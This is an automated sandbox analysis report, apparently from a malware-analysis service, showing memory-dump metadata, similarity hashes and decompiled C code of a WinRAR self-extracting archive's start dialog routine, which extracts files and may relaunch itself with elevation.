0x008464e9
0x008464eb
0x008464ed
0x008464ef
0x008464f1
0x008464f5
0x008464f5
0x008464fb
0x008464ff
0x00846503
0x00846507
0x00846509
0x0084650c
0x0084650e
0x00846511
0x00846513
0x00846515
0x00846517
0x00846517
0x00846519
0x0084651e
0x00846521
0x00846536
0x00846523
0x00846526
0x00846526
0x0084653f
0x00846541
0x00846545
0x00846549
0x00846549
0x0084654f
0x0084654f
0x00846553
0x00846557
0x00846559
0x008466b4
0x00000000
0x0084655f
0x00846562
0x00846569
0x0084656d
0x0084656f
0x008465db
0x008465db
0x00000000
0x00846571
0x00846571
0x00846571
0x00846573
0x00846576
0x00846578
0x0084657f
0x0084659a
0x0084659d
0x008465a2
0x008465a4
0x00000000
0x00000000
0x00846581
0x00846584
0x00846589
0x0084658b
0x00846591
0x00846598
0x008465aa
0x008465aa
0x008465b1
0x008465b7
0x008465be
0x00846615
0x0084661a
0x0084661d
0x0084661f
0x00846625
0x0084662c
0x00846630
0x00846638
0x0084663e
0x00846641
0x00846645
0x0084664c
0x00846650
0x00846657
0x00846659
0x0084665b
0x00846671
0x00846679
0x00846682
0x00846686
0x0084668c
0x00000000
0x0084668c
0x00000000
0x00846659
0x008465c0
0x008465c0
0x008465c4
0x0084660a
0x0084660c
0x008465df
0x008465df
0x008465e1
0x008465e7
0x008465eb
0x008465ed
0x008465f3
0x0084669e
0x008466a0
0x008466a2
0x00846696
0x00846696
0x00846698
0x008466b8
0x008466b8
0x008466bd
0x00000000
0x00000000
0x008466a4
0x008466ad
0x00846693
0x00846693
0x00000000
0x00846693
0x008466a2
0x008465f9
0x008465f9
0x00000000
0x008465f9
0x008465f3
0x00000000
0x00000000
0x00000000
0x008465c4
0x008465be
0x00000000
0x00000000
0x00000000
0x00846598
0x0084658b
0x00000000
0x008465c6
0x008465ca
0x008465d0
0x008465d1
0x008465d5
0x008465d5
0x00000000
0x00846573
0x0084656f
0x00000000
0x00846559
0x00846605
0x00000000
0x008463a7
0x0084639b
0x00000000
0x00846393
0x008466c3
0x008466cb
0x008466ce
0x008466d3
0x008466e1
0x008466e6
0x008466f4
0x00846712

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9b85e2d264910ff42a40567625e1bdcc1077154afe9916a748a68e21743a4609
Instruction ID: c39fb740dfce5afb9c3232faaab6ae570d479d2b119af3319628f4e78270aa90
Opcode Fuzzy Hash: 9b85e2d264910ff42a40567625e1bdcc1077154afe9916a748a68e21743a4609
Instruction Fuzzy Hash: 94D1C6B1A043498FDB14CF28C88175ABBE0FF96308F05056DE945DB646E734E968CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0084A62C, Relevance: 97.0, APIs: 46, Strings: 9, Instructions: 724
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0084A62C(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				struct HWND__* _t152;
				void* _t163;
				void* _t166;
				int _t169;
				void* _t182;
				struct HWND__* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				void* _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t254;
				WCHAR* _t255;
				int _t259;
				void* _t261;
				void* _t266;
				void* _t270;
				signed short _t275;
				int _t277;
				struct HWND__* _t279;
				WCHAR* _t286;
				intOrPtr _t288;
				intOrPtr _t289;
				void* _t291;
				intOrPtr _t292;
				void* _t304;
				struct HWND__* _t306;
				signed int _t309;
				void* _t310;
				struct HWND__* _t312;
				void* _t314;
				long _t316;
				struct HWND__* _t319;
				struct HWND__* _t320;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;

				_t303 = __edx;
				_t285 = __ecx;
				E0084D8C4(E00861584, __ecx);
				E0084D9C0();
				_t275 =  *(_t325 + 0x10);
				_t309 =  *(_t325 + 0xc);
				_t306 =  *(_t325 + 8);
				if(E008312D7(__edx, _t306, _t309, _t275,  *(_t325 + 0x14), L"STARTDLG", 0, 0) == 0) {
					_t310 = _t309 - 0x110;
					__eflags = _t310;
					if(__eflags == 0) {
						E0084C399(__edx, __eflags, __fp0, _t306);
						_t105 =  *0x87b704;
						_t277 = 1;
						 *0x8775c8 = _t306;
						 *0x8775e8 = _t306;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t306, 0x80, 1, _t105); // executed
						}
						_t106 =  *0x885d04;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t306, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t306, 0x68);
						 *(_t325 + 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E0084966B(_t325 - 0x1164, 0x800);
						_t111 = GetDlgItem(_t306, 0x66);
						__eflags =  *0x879602;
						_t312 = _t111;
						 *(_t325 + 0x10) = _t312;
						_t286 = 0x879602;
						if( *0x879602 == 0) {
							_t286 = _t325 - 0x1164;
						}
						SetWindowTextW(_t312, _t286);
						E00849AA5(_t312); // executed
						_push(0x8775d8);
						_push(0x8775d4);
						_push(0x88ce18);
						_push(_t306);
						 *0x8775f3 = 0; // executed
						_t114 = E00849F62(_t286, _t303, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0x8775ce = _t277;
						}
						__eflags =  *0x8775d8;
						if( *0x8775d8 > 0) {
							_push(7);
							_push( *0x8775d4);
							_push(_t306);
							E0084B522(_t286, _t303);
						}
						__eflags =  *0x88de20;
						if( *0x88de20 == 0) {
							SetDlgItemTextW(_t306, 0x6b, E0083DA8B(0xbf));
							SetDlgItemTextW(_t306, _t277, E0083DA8B(0xbe));
						}
						__eflags =  *0x8775d8;
						if( *0x8775d8 <= 0) {
							L103:
							__eflags =  *0x8775f3;
							if( *0x8775f3 != 0) {
								L114:
								__eflags =  *0x8795fc - 2;
								if( *0x8795fc == 2) {
									EnableWindow(_t312, 0);
								}
								__eflags =  *0x8785f8;
								if( *0x8785f8 != 0) {
									E00831294(_t306, 0x67, 0);
									E00831294(_t306, 0x66, 0);
								}
								_t115 =  *0x8795fc;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0x8775cc;
									if( *0x8775cc == 0) {
										_push(0);
										_push(_t277);
										_push(0x111);
										_push(_t306);
										__eflags = _t115 - _t277;
										if(_t115 != _t277) {
											 *0x86df38();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x8775ce;
								if( *0x8775ce != 0) {
									SetDlgItemTextW(_t306, _t277, E0083DA8B(0x90));
								}
								goto L125;
							}
							__eflags =  *0x88ce0c;
							if( *0x88ce0c != 0) {
								goto L114;
							}
							__eflags =  *0x8795fc;
							if( *0x8795fc != 0) {
								goto L114;
							}
							__eflags = 0;
							_t314 = 0xaa;
							 *((short*)(_t325 - 0x9688)) = 0;
							do {
								__eflags = _t314 - 0xaa;
								if(_t314 != 0xaa) {
									L109:
									__eflags = _t314 - 0xab;
									if(__eflags != 0) {
										L111:
										E0083FABF(__eflags, _t325 - 0x9688, " ", 0x2000);
										E0083FABF(__eflags, _t325 - 0x9688, E0083DA8B(_t314), 0x2000);
										goto L112;
									}
									__eflags =  *0x88de20;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0x88de20;
								if( *0x88de20 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t314 = _t314 + 1;
								__eflags = _t314 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0x8775dc; // 0x0
							E00849059(_t288, __eflags,  *0x870064,  *(_t325 + 0x14), _t325 - 0x9688, 0, 0);
							_t312 =  *(_t325 + 0x10);
							goto L114;
						} else {
							_push(0);
							_push( *0x8775d4);
							_push(_t306); // executed
							E0084B522(_t286, _t303); // executed
							_t133 =  *0x88ce0c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0x8795fc;
								if(__eflags == 0) {
									_t289 =  *0x8775dc; // 0x0
									E00849059(_t289, __eflags,  *0x870064,  *(_t325 + 0x14), _t133, 0, 0);
									L00852BAE( *0x88ce0c);
									_pop(_t286);
								}
							}
							__eflags =  *0x8795fc - _t277;
							if( *0x8795fc == _t277) {
								L102:
								_push(_t277);
								_push( *0x8775d4);
								_push(_t306);
								E0084B522(_t286, _t303);
								goto L103;
							} else {
								 *0x86df3c(_t306);
								__eflags =  *0x8795fc - _t277;
								if( *0x8795fc == _t277) {
									goto L102;
								}
								__eflags =  *0x879601;
								if( *0x879601 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0x8775d4);
								_push(_t306);
								E0084B522(_t286, _t303);
								__eflags =  *0x88de18;
								if( *0x88de18 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0x870064, L"LICENSEDLG", 0, E0084A43C, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0x8775cc = _t277;
									L26:
									_push(_t277);
									L13:
									EndDialog(_t306, ??); // executed
									L125:
									_t116 = _t277;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t325 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t310 != 1;
					if(_t310 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t275 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0x8775cd;
						if( *0x8775cd != 0) {
							L23:
							_t316 = 0x800;
							GetDlgItemTextW(_t306, 0x66, _t325 - 0x2164, 0x800);
							__eflags =  *0x8775cd;
							if( *0x8775cd == 0) {
								__eflags =  *0x8775ce;
								if( *0x8775ce == 0) {
									_t152 = GetDlgItem(_t306, 0x68);
									__eflags =  *0x8775ec;
									_t279 = _t152;
									if( *0x8775ec == 0) {
										SendMessageW(_t279, 0xb1, 0, 0xffffffff);
										SendMessageW(_t279, 0xc2, 0, 0x8622e4);
										_t316 = 0x800;
									}
									SetFocus(_t279);
									__eflags =  *0x8785f8;
									if( *0x8785f8 == 0) {
										E0083FAE7(_t325 - 0x1164, _t325 - 0x2164, _t316);
										E0084C16A(_t285, _t325 - 0x1164, _t316);
										E00833F53(_t325 - 0x4288, 0x880, E0083DA8B(0xb9), _t325 - 0x1164);
										_t327 = _t327 + 0x10;
										_t163 = _t325 - 0x4288;
									} else {
										_t163 = E0083DA8B(0xba);
									}
									E0084C1EB(0, _t163);
									__eflags =  *0x879601;
									if( *0x879601 == 0) {
										E0084C852(_t325 - 0x2164);
									}
									_push(0);
									_push(_t325 - 0x2164);
									 *(_t325 + 0x17) = 0;
									_t166 = E00839DDE(0, _t325);
									_t277 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t304 = E00849B00(_t325 - 0x2164);
										 *((char*)(_t325 + 0x13)) = _t304;
										__eflags = _t304;
										if(_t304 != 0) {
											L43:
											_t169 =  *(_t325 + 0x17);
											L44:
											_t291 =  *0x879601;
											__eflags = _t291;
											if(_t291 != 0) {
												L50:
												__eflags =  *((char*)(_t325 + 0x13));
												if( *((char*)(_t325 + 0x13)) != 0) {
													 *0x8775d0 = _t277;
													E008312B2(_t306, 0x67, 0);
													E008312B2(_t306, 0x66, 0);
													SetDlgItemTextW(_t306, _t277, E0083DA8B(0xe6)); // executed
													E008312B2(_t306, 0x69, _t277);
													SetDlgItemTextW(_t306, 0x65, 0x8622e4); // executed
													_t319 = GetDlgItem(_t306, 0x65);
													__eflags = _t319;
													if(_t319 != 0) {
														_t195 = GetWindowLongW(_t319, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t319, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0x8775d4);
													_push(_t306);
													E0084B522(_t291, _t304);
													_push(2);
													_push( *0x8775d4);
													_push(_t306);
													E0084B522(_t291, _t304);
													_push(0x88ce18);
													_push(_t306);
													 *0x88fe3c = _t277; // executed
													E0084C755(_t291, _t304, __eflags); // executed
													_push(6);
													_push( *0x8775d4);
													 *0x88fe3c = 0;
													_push(_t306);
													E0084B522(_t291, _t304);
													__eflags =  *0x8775cc;
													if( *0x8775cc == 0) {
														__eflags =  *0x8775ec;
														if( *0x8775ec == 0) {
															__eflags =  *0x88de2c;
															if( *0x88de2c == 0) {
																_push(4);
																_push( *0x8775d4);
																_push(_t306);
																E0084B522(_t291, _t304);
															}
														}
													}
													E00831294(_t306, _t277, _t277);
													 *0x8775d0 =  *0x8775d0 & 0x00000000;
													__eflags =  *0x8775d0;
													_t182 =  *0x8775cc; // 0x1
													goto L75;
												}
												__eflags = _t291;
												_t169 = (_t169 & 0xffffff00 | _t291 != 0x00000000) - 0x00000001 &  *(_t325 + 0x17);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t325 + 0x17) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t325 + 0x17);
													if( *(_t325 + 0x17) != 0) {
														_push(E0083DA8B(0x9a));
														E00833F53(_t325 - 0x5688, 0xa00, L"\"%s\"\n%s", _t325 - 0x2164);
														E00836F18(0x8700e0, _t277);
														E008497A8(_t306, _t325 - 0x5688, E0083DA8B(0x96), 0x30);
														 *0x8775ec =  *0x8775ec + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t325 - 0x1164, 0x800);
												E0083E7E0(0x87b602, _t325 - 0x164, 0x80);
												_push(0x87a602);
												E00833F53(_t325 - 0x11ca0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t325 - 0x2164);
												_t327 = _t327 + 0x14;
												 *(_t325 - 0x48) = 0x3c;
												 *((intOrPtr*)(_t325 - 0x44)) = 0x40;
												 *((intOrPtr*)(_t325 - 0x38)) = _t325 - 0x1164;
												 *((intOrPtr*)(_t325 - 0x34)) = _t325 - 0x11ca0;
												 *(_t325 - 0x40) = _t306;
												 *((intOrPtr*)(_t325 - 0x3c)) = L"runas";
												 *(_t325 - 0x2c) = _t277;
												 *((intOrPtr*)(_t325 - 0x28)) = 0;
												 *((intOrPtr*)(_t325 - 0x30)) = 0x8775f8;
												_t321 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t325 + 8) = _t321;
												__eflags = _t321;
												if(_t321 == 0) {
													 *(_t325 + 0x10) =  *(_t325 + 0x14);
												} else {
													 *0x885d08 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E0083FAE7(0x885d0a, _t231, 0x2000);
													}
													E0084A2C1(0x87b602, 0x889d0a, 7);
													E0084A2C1(0x87b602, 0x88ad0a, 2);
													E0084A2C1(0x87b602, 0x88bd0a, 0x10);
													 *0x88ce0b = _t277;
													E0083E942(_t277, 0x88cd0a, _t325 - 0x164);
													 *(_t325 + 0x10) = MapViewOfFile(_t321, 2, 0, 0, 0);
													E0084EA80(_t238, 0x885d08, 0x7104);
													_t327 = _t327 + 0xc;
												}
												_t220 = ShellExecuteExW(_t325 - 0x48);
												E0083E98D(_t325 - 0x164, 0x80);
												E0083E98D(_t325 - 0x11ca0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t323 =  *(_t325 + 0x10);
													 *(_t325 + 0x17) = _t277;
													goto L64;
												} else {
													 *0x86df20( *(_t325 - 0x10), 0x2710);
													_t71 = _t325 + 0xc;
													 *_t71 =  *(_t325 + 0xc) & 0x00000000;
													__eflags =  *_t71;
													_t323 =  *(_t325 + 0x10);
													while(1) {
														__eflags =  *_t323;
														if( *_t323 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t325 + 0xc) + 1;
														 *(_t325 + 0xc) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0x88de2c =  *(_t325 - 0x10);
													L64:
													__eflags =  *(_t325 + 8);
													if( *(_t325 + 8) != 0) {
														UnmapViewOfFile(_t323);
														CloseHandle( *(_t325 + 8));
													}
													goto L66;
												}
											}
											__eflags = _t304;
											if(_t304 == 0) {
												goto L52;
											}
											E00833F53(_t325 - 0x1164, 0x800, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t327 = _t327 + 0x10;
											E008394D4(_t325 - 0x3188);
											 *(_t325 - 4) =  *(_t325 - 4) & 0x00000000;
											_push(0x11);
											_push(_t325 - 0x1164);
											_t246 = E008395C0(_t325 - 0x3188);
											 *((char*)(_t325 + 0x13)) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t325 + 0x17) = _t277;
												}
											}
											_t39 = _t325 - 4;
											 *_t39 =  *(_t325 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E00839506(_t325 - 0x3188); // executed
											_t291 =  *0x879601;
											goto L50;
										}
										_t248 = GetLastError();
										_t304 =  *((intOrPtr*)(_t325 + 0x13));
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t277;
										 *(_t325 + 0x17) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t325 + 0x17) = _t277;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t277 = 1;
									_t182 = 1;
									 *0x8775cc = 1;
									L75:
									__eflags =  *0x8775ec;
									if( *0x8775ec <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0x8775cd = _t277;
									SetDlgItemTextW(_t306, _t277, E0083DA8B(0x90));
									_t292 =  *0x8700e0; // 0x0
									__eflags = _t292 - 9;
									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t325 + 0x14) = _t189;
										_t320 = _t189;
									} else {
										_t320 = 0xa0;
									}
									_t190 = E0083DA8B(0x96);
									E008497A8(_t306, E0083DA8B(_t320), _t190, 0x30);
									goto L125;
								}
							}
							_t277 = 1;
							__eflags =  *0x8775ce;
							if( *0x8775ce == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0x88fe3c;
						if( *0x88fe3c == 0) {
							goto L23;
						} else {
							__eflags =  *0x88fe3d;
							_t254 = _t149 & 0xffffff00 |  *0x88fe3d == 0x00000000;
							__eflags = _t254;
							 *0x88fe3d = _t254;
							_t255 = E0083DA8B((0 | _t254 != 0x00000000) + 0xe6);
							_t277 = 1;
							SetDlgItemTextW(_t306, 1, _t255);
							while(1) {
								__eflags =  *0x88fe3d;
								if( *0x88fe3d == 0) {
									goto L125;
								}
								__eflags =  *0x8775cc;
								if( *0x8775cc != 0) {
									goto L125;
								}
								_t259 = GetMessageW(_t325 - 0x64, 0, 0, 0);
								__eflags = _t259;
								if(_t259 == 0) {
									goto L125;
								} else {
									_t261 =  *0x86df50(_t306, _t325 - 0x64);
									__eflags = _t261;
									if(_t261 == 0) {
										TranslateMessage(_t325 - 0x64);
										DispatchMessageW(_t325 - 0x64);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t266 = _t149 - 1;
					__eflags = _t266;
					if(_t266 == 0) {
						_t277 = 1;
						__eflags =  *0x8775d0;
						 *0x8775cc = 1;
						if( *0x8775d0 == 0) {
							goto L12;
						}
						__eflags =  *0x8775ec;
						if( *0x8775ec != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t266 == 0x65;
					if(_t266 == 0x65) {
						_t270 = E00831217(_t306, E0083DA8B(0x64), _t325 - 0x1164);
						__eflags = _t270;
						if(_t270 != 0) {
							SetDlgItemTextW(_t306, 0x66, _t325 - 0x1164);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}

0x0084a62c
0x0084a62c
0x0084a631
0x0084a63b
0x0084a641
0x0084a645
0x0084a649
0x0084a662
0x0084a66c
0x0084a66c
0x0084a672
0x0084ad0e
0x0084ad13
0x0084ad1a
0x0084ad1b
0x0084ad21
0x0084ad27
0x0084ad29
0x0084ad33
0x0084ad33
0x0084ad39
0x0084ad3e
0x0084ad40
0x0084ad4d
0x0084ad4d
0x0084ad5c
0x0084ad6b
0x0084ad6e
0x0084ad80
0x0084ad88
0x0084ad8a
0x0084ad92
0x0084ad94
0x0084ad97
0x0084ad9c
0x0084ad9e
0x0084ad9e
0x0084ada6
0x0084adad
0x0084adb2
0x0084adb7
0x0084adbc
0x0084adc1
0x0084adc2
0x0084adc9
0x0084adce
0x0084add0
0x0084add2
0x0084add2
0x0084add8
0x0084addf
0x0084ade1
0x0084ade3
0x0084ade9
0x0084adea
0x0084adea
0x0084adef
0x0084adf6
0x0084ae06
0x0084ae19
0x0084ae19
0x0084ae1f
0x0084ae26
0x0084aed7
0x0084aed7
0x0084aede
0x0084af87
0x0084af87
0x0084af8e
0x0084af93
0x0084af93
0x0084af99
0x0084afa0
0x0084afa7
0x0084afb1
0x0084afb1
0x0084afb6
0x0084afbb
0x0084afbd
0x0084afbf
0x0084afc6
0x0084afc8
0x0084afca
0x0084afcb
0x0084afd0
0x0084afd1
0x0084afd3
0x0084afdd
0x0084afd5
0x0084afd5
0x0084afd5
0x0084afd3
0x0084afc6
0x0084afe3
0x0084afea
0x0084aff9
0x0084aff9
0x00000000
0x0084afea
0x0084aee4
0x0084aeeb
0x00000000
0x00000000
0x0084aef1
0x0084aef8
0x00000000
0x00000000
0x0084aefe
0x0084af00
0x0084af05
0x0084af0c
0x0084af0c
0x0084af12
0x0084af1d
0x0084af1d
0x0084af23
0x0084af2e
0x0084af3f
0x0084af57
0x00000000
0x0084af57
0x0084af25
0x0084af2c
0x00000000
0x00000000
0x00000000
0x0084af2c
0x0084af14
0x0084af1b
0x00000000
0x00000000
0x00000000
0x0084af5c
0x0084af5c
0x0084af5d
0x0084af5d
0x0084af65
0x0084af7f
0x0084af84
0x00000000
0x0084ae2c
0x0084ae2c
0x0084ae2e
0x0084ae34
0x0084ae35
0x0084ae3a
0x0084ae3f
0x0084ae41
0x0084ae43
0x0084ae4a
0x0084ae4c
0x0084ae60
0x0084ae6b
0x0084ae70
0x0084ae70
0x0084ae4a
0x0084ae71
0x0084ae77
0x0084aeca
0x0084aeca
0x0084aecb
0x0084aed1
0x0084aed2
0x00000000
0x0084ae79
0x0084ae7a
0x0084ae80
0x0084ae86
0x00000000
0x00000000
0x0084ae88
0x0084ae8f
0x00000000
0x00000000
0x0084ae91
0x0084ae93
0x0084ae99
0x0084ae9a
0x0084ae9f
0x0084aea6
0x00000000
0x00000000
0x0084aebc
0x0084aec2
0x0084aec4
0x0084a7b8
0x0084a7b8
0x0084a7be
0x0084a7be
0x0084a6e2
0x0084a6e3
0x0084afff
0x0084afff
0x0084b001
0x0084b007
0x0084b011
0x0084b011
0x00000000
0x0084aec4
0x0084ae77
0x0084ae26
0x0084a678
0x0084a67b
0x0084a68f
0x0084a68f
0x00000000
0x0084a68f
0x0084a680
0x0084a680
0x0084a683
0x0084a6ee
0x0084a6f5
0x0084a78d
0x0084a78d
0x0084a79d
0x0084a7a3
0x0084a7aa
0x0084a7c4
0x0084a7cb
0x0084a7df
0x0084a7e5
0x0084a7ec
0x0084a7ee
0x0084a800
0x0084a80f
0x0084a811
0x0084a811
0x0084a817
0x0084a81d
0x0084a824
0x0084a841
0x0084a84e
0x0084a871
0x0084a876
0x0084a879
0x0084a826
0x0084a82b
0x0084a82b
0x0084a882
0x0084a887
0x0084a88e
0x0084a897
0x0084a897
0x0084a89c
0x0084a8a6
0x0084a8a7
0x0084a8aa
0x0084a8b7
0x0084a8b8
0x0084a8ba
0x0084a8cd
0x0084a8d9
0x0084a8db
0x0084a8de
0x0084a8e0
0x0084a8f3
0x0084a8f3
0x0084a8f6
0x0084a8f6
0x0084a8fc
0x0084a8fe
0x0084a96d
0x0084a96d
0x0084a971
0x0084abb5
0x0084abbb
0x0084abc5
0x0084abdd
0x0084abe3
0x0084abf0
0x0084abfb
0x0084abfd
0x0084abff
0x0084ac0a
0x0084ac0a
0x0084ac13
0x0084ac13
0x0084ac19
0x0084ac1b
0x0084ac21
0x0084ac22
0x0084ac27
0x0084ac29
0x0084ac2f
0x0084ac30
0x0084ac35
0x0084ac3a
0x0084ac3b
0x0084ac41
0x0084ac46
0x0084ac48
0x0084ac4e
0x0084ac55
0x0084ac56
0x0084ac5b
0x0084ac62
0x0084ac64
0x0084ac6b
0x0084ac6d
0x0084ac74
0x0084ac76
0x0084ac78
0x0084ac7e
0x0084ac7f
0x0084ac7f
0x0084ac74
0x0084ac6b
0x0084ac87
0x0084ac8c
0x0084ac8c
0x0084ac93
0x00000000
0x0084ac93
0x0084a977
0x0084a97e
0x0084a97e
0x0084a981
0x0084a981
0x0084a983
0x0084a987
0x0084a989
0x0084ab4b
0x0084ab4b
0x0084ab4f
0x0084ab5f
0x0084ab78
0x0084ab86
0x0084aba0
0x0084aba5
0x0084aba5
0x0084a6e0
0x0084a6e0
0x00000000
0x0084a6e0
0x0084a99d
0x0084a9b4
0x0084a9b9
0x0084a9d6
0x0084a9db
0x0084a9de
0x0084a9eb
0x0084a9f2
0x0084a9fb
0x0084aa13
0x0084aa16
0x0084aa1d
0x0084aa20
0x0084aa23
0x0084aa30
0x0084aa32
0x0084aa35
0x0084aa37
0x0084aac2
0x0084aa3d
0x0084aa3d
0x0084aa44
0x0084aa4a
0x0084aa4c
0x0084aa59
0x0084aa59
0x0084aa65
0x0084aa71
0x0084aa7d
0x0084aa88
0x0084aa94
0x0084aab2
0x0084aab5
0x0084aaba
0x0084aaba
0x0084aac9
0x0084aadd
0x0084aaee
0x0084aaf3
0x0084aaf5
0x0084ab2f
0x0084ab32
0x00000000
0x0084aaf7
0x0084aaff
0x0084ab05
0x0084ab05
0x0084ab05
0x0084ab09
0x0084ab0c
0x0084ab0c
0x0084ab0f
0x00000000
0x00000000
0x0084ab13
0x0084ab1c
0x0084ab1d
0x0084ab20
0x0084ab23
0x00000000
0x00000000
0x00000000
0x0084ab23
0x0084ab28
0x0084ab35
0x0084ab35
0x0084ab39
0x0084ab3c
0x0084ab45
0x0084ab45
0x00000000
0x0084ab39
0x0084aaf5
0x0084a900
0x0084a902
0x00000000
0x00000000
0x0084a91c
0x0084a921
0x0084a92a
0x0084a92f
0x0084a939
0x0084a93b
0x0084a942
0x0084a947
0x0084a94a
0x0084a94c
0x0084a94e
0x0084a950
0x0084a953
0x0084a955
0x0084a955
0x0084a953
0x0084a958
0x0084a958
0x0084a958
0x0084a962
0x0084a967
0x00000000
0x0084a967
0x0084a8e2
0x0084a8e4
0x0084a8e7
0x0084a8ea
0x00000000
0x00000000
0x0084a8ec
0x0084a8ee
0x00000000
0x0084a8bc
0x0084a8bc
0x0084a8be
0x0084a8c1
0x0084a8c8
0x0084a8ca
0x00000000
0x0084a8ca
0x0084a8c3
0x0084a8c6
0x00000000
0x00000000
0x00000000
0x0084a8c6
0x0084a7cd
0x0084a7cf
0x0084a7d0
0x0084a7d2
0x0084ac98
0x0084ac98
0x0084ac9f
0x00000000
0x00000000
0x0084aca5
0x0084aca7
0x00000000
0x00000000
0x0084acb2
0x0084acc0
0x0084acc6
0x0084accc
0x0084accf
0x0084acda
0x0084ace4
0x0084ace4
0x0084ace9
0x0084acec
0x0084acd1
0x0084acd1
0x0084acd1
0x0084acf5
0x0084ad03
0x00000000
0x0084ad03
0x0084a7cb
0x0084a7ae
0x0084a7af
0x0084a7b6
0x00000000
0x00000000
0x00000000
0x0084a7b6
0x0084a6fb
0x0084a702
0x00000000
0x0084a708
0x0084a708
0x0084a70f
0x0084a714
0x0084a716
0x0084a725
0x0084a72d
0x0084a730
0x0084a77f
0x0084a77f
0x0084a786
0x0084a788
0x0084a788
0x0084a738
0x0084a73f
0x00000000
0x00000000
0x0084a74e
0x0084a754
0x0084a756
0x00000000
0x0084a75c
0x0084a761
0x0084a767
0x0084a769
0x0084a76f
0x0084a779
0x0084a779
0x00000000
0x0084a769
0x0084a756
0x00000000
0x0084a77f
0x0084a702
0x0084a685
0x0084a685
0x0084a688
0x0084a6c3
0x0084a6c4
0x0084a6cb
0x0084a6d1
0x00000000
0x00000000
0x0084a6d3
0x0084a6da
0x00000000
0x00000000
0x00000000
0x0084a6da
0x0084a68a
0x0084a68d
0x0084a6a6
0x0084a6ab
0x0084a6ad
0x0084a6b9
0x0084a6b9
0x00000000
0x0084a6ad
0x00000000
0x0084a68d
0x0084a664
0x0084a666
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0084A631

Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331

Strings

winrarsfxmappingfile.tmp, xrefs: 0084AA00
@, xrefs: 0084A9EB
C:\Users\user\Desktop, xrefs: 0084AA23
-el -s2 "-d%s" "-sp%s", xrefs: 0084A9C5
LICENSEDLG, xrefs: 0084AEB1
